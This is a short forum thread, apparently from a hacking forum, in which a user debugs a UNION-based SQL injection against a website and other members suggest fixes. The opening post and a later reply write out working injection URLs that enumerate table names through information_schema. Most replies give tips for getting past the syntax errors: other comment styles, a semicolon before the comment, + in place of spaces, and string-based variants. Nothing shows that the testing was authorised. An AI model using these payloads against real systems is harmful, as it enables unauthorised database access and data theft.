Author Topic: sqli error (Read 1521 times)

$Clone · « **on:** July 19, 2015, 05:35:12 am »

hey there am try to test for sqli in a website where i have found table to be vulnerable. the url is
http://www.example.com/test.php?id=null UNION SELECT 1,group_concat(table_NAME),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database--

i get error:

Code: [Select]

invalid query: You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near '-' at line 1

i have tried removing the -- but i don't get how??/ $:-\$ its not working.....

andmuchmore · « **Reply #1 on:** July 20, 2015, 05:56:51 am »

Have you tried different comment types?
# or /* instead of -- ect?

sh4d0w_w4tch · « **Reply #2 on:** July 20, 2015, 08:59:42 am »

You need to include ; before the comment. As was mentioned, try using different comment types.

Stackprotector · « **Reply #3 on:** July 20, 2015, 11:33:50 am »

^ this and try to include + instead of spaces.

$Clone · « **Reply #4 on:** July 20, 2015, 12:11:53 pm »

actually i notice once you get the vul tables you just put
www.example.com/index.php?id=null UNION SELECT 1,table_NAME,3,4,5,6,7,8,9,10 from information_schema.tables-- and it worked fine

Vellichor · « **Reply #5 on:** August 13, 2015, 02:03:33 pm »

-- is sufficient for normal integer based injection
--+-+ / -- - is required upon handling string-based injection
all speaking MySQL>=5

EvilZone

News:

Author Topic: sqli error (Read 1521 times)

$Clone

sqli error

andmuchmore

Re: sqli error

sh4d0w_w4tch

Re: sqli error

Stackprotector

Re: sqli error

$Clone

Re: sqli error

Vellichor

Re: sqli error